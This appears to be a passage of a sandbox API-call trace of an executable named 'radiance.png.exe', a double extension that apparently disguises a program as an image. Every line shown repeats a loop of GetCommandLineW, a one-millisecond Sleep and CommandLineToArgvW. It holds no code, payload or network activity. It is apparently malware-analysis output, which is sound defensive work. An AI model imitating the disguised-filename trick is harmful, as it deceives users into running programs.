	[0032.139] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.139] Sleep (dwMilliseconds=0x1) 
	[0032.154] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c298*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.154] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.154] Sleep (dwMilliseconds=0x1) 
	[0032.170] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c308*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.170] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.170] Sleep (dwMilliseconds=0x1) 
	[0032.185] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c378*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.185] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.185] Sleep (dwMilliseconds=0x1) 
	[0032.270] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c3e8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.270] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.270] Sleep (dwMilliseconds=0x1) 
	[0032.285] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c458*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.285] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.285] Sleep (dwMilliseconds=0x1) 
	[0032.318] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c4c8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.318] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.318] Sleep (dwMilliseconds=0x1) 
	[0032.328] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c538*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.328] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.328] Sleep (dwMilliseconds=0x1) 
	[0032.404] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c5a8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.404] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.404] Sleep (dwMilliseconds=0x1) 
	[0032.450] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c618*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.450] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.450] Sleep (dwMilliseconds=0x1) 
	[0032.494] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c688*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.494] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.494] Sleep (dwMilliseconds=0x1) 
	[0032.514] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c6f8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.514] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.514] Sleep (dwMilliseconds=0x1) 
	[0032.542] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c768*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.542] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.542] Sleep (dwMilliseconds=0x1) 
	[0032.578] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c7d8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.578] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.578] Sleep (dwMilliseconds=0x1) 
	[0032.590] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c848*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.590] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.590] Sleep (dwMilliseconds=0x1) 
	[0032.620] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c8b8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.620] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.620] Sleep (dwMilliseconds=0x1) 
	[0032.646] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c928*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.646] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.646] Sleep (dwMilliseconds=0x1) 
	[0032.692] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18c9d8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.692] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.692] Sleep (dwMilliseconds=0x1) 
	[0032.717] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18ca48*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.717] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.717] Sleep (dwMilliseconds=0x1) 
	[0032.761] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18cab8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.761] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.761] Sleep (dwMilliseconds=0x1) 
	[0032.778] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18cb28*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.778] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.778] Sleep (dwMilliseconds=0x1) 
	[0032.802] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18cb98*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.802] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.802] Sleep (dwMilliseconds=0x1) 
	[0032.809] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18cc08*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.809] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.809] Sleep (dwMilliseconds=0x1) 
	[0032.827] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18cc78*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0032.827] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0032.827] Sleep (dwMilliseconds=0x1) 
	[0038.996] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18cce8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0038.996] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0038.996] Sleep (dwMilliseconds=0x1) 
	[0039.002] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18cd58*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.002] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.002] Sleep (dwMilliseconds=0x1) 
	[0039.057] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18cdc8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.057] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.057] Sleep (dwMilliseconds=0x1) 
	[0039.103] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18ce38*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.103] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.103] Sleep (dwMilliseconds=0x1) 
	[0039.110] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18cea8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.110] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.110] Sleep (dwMilliseconds=0x1) 
	[0039.131] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18cf18*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.131] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.131] Sleep (dwMilliseconds=0x1) 
	[0039.143] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18cf88*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.143] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.143] Sleep (dwMilliseconds=0x1) 
	[0039.160] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18cff8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.160] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.160] Sleep (dwMilliseconds=0x1) 
	[0039.187] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d068*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.187] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.187] Sleep (dwMilliseconds=0x1) 
	[0039.194] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d0d8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.194] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.194] Sleep (dwMilliseconds=0x1) 
	[0039.207] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d148*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.207] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.207] Sleep (dwMilliseconds=0x1) 
	[0039.222] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d1b8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.223] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.223] Sleep (dwMilliseconds=0x1) 
	[0039.236] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d228*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.236] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.236] Sleep (dwMilliseconds=0x1) 
	[0039.251] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d298*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.251] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.251] Sleep (dwMilliseconds=0x1) 
	[0039.271] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d308*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.271] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.271] Sleep (dwMilliseconds=0x1) 
	[0039.304] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d378*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.304] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.304] Sleep (dwMilliseconds=0x1) 
	[0039.344] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d3e8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.344] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.344] Sleep (dwMilliseconds=0x1) 
	[0039.391] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d458*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.391] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.391] Sleep (dwMilliseconds=0x1) 
	[0039.416] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d4c8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.417] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.418] Sleep (dwMilliseconds=0x1) 
	[0039.469] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d538*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.469] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.469] Sleep (dwMilliseconds=0x1) 
	[0039.505] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d5a8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.505] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.505] Sleep (dwMilliseconds=0x1) 
	[0039.522] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d618*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.522] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.522] Sleep (dwMilliseconds=0x1) 
	[0039.549] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d688*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.549] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.549] Sleep (dwMilliseconds=0x1) 
	[0039.565] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d6f8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.566] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.566] Sleep (dwMilliseconds=0x1) 
	[0039.594] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d768*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.594] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.594] Sleep (dwMilliseconds=0x1) 
	[0039.642] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d7d8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.642] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.642] Sleep (dwMilliseconds=0x1) 
	[0039.688] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d848*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.688] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.688] Sleep (dwMilliseconds=0x1) 
	[0039.711] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d8b8*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.711] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.711] Sleep (dwMilliseconds=0x1) 
	[0039.719] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x18d928*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.720] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.720] Sleep (dwMilliseconds=0x1) 
	[0039.734] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1baba0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.734] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.734] Sleep (dwMilliseconds=0x1) 
	[0039.750] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bac10*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.750] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.750] Sleep (dwMilliseconds=0x1) 
	[0039.781] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bac80*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.781] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.781] Sleep (dwMilliseconds=0x1) 
	[0039.827] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bacf0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.827] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.827] Sleep (dwMilliseconds=0x1) 
	[0039.844] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bad60*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.844] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.844] Sleep (dwMilliseconds=0x1) 
	[0039.874] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1badd0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.874] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.874] Sleep (dwMilliseconds=0x1) 
	[0039.910] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bae40*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.910] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.910] Sleep (dwMilliseconds=0x1) 
	[0039.952] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1baeb0*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.952] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.952] Sleep (dwMilliseconds=0x1) 
	[0039.975] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1baf20*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.975] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.975] Sleep (dwMilliseconds=0x1) 
	[0039.999] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1baf90*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0039.999] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0039.999] Sleep (dwMilliseconds=0x1) 
	[0040.044] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb000*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.044] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.044] Sleep (dwMilliseconds=0x1) 
	[0040.060] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" ", pNumArgs=0x1a8905d | out: pNumArgs=0x1a8905d) returned 0x1bb070*="C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe"
	[0040.060] GetCommandLineW () returned="\"C:\\Users\\2XC7u663GxWc\\Desktop\\radiance.png.exe\" "
	[0040.061] Sleep (dwMilliseconds=0x1) 
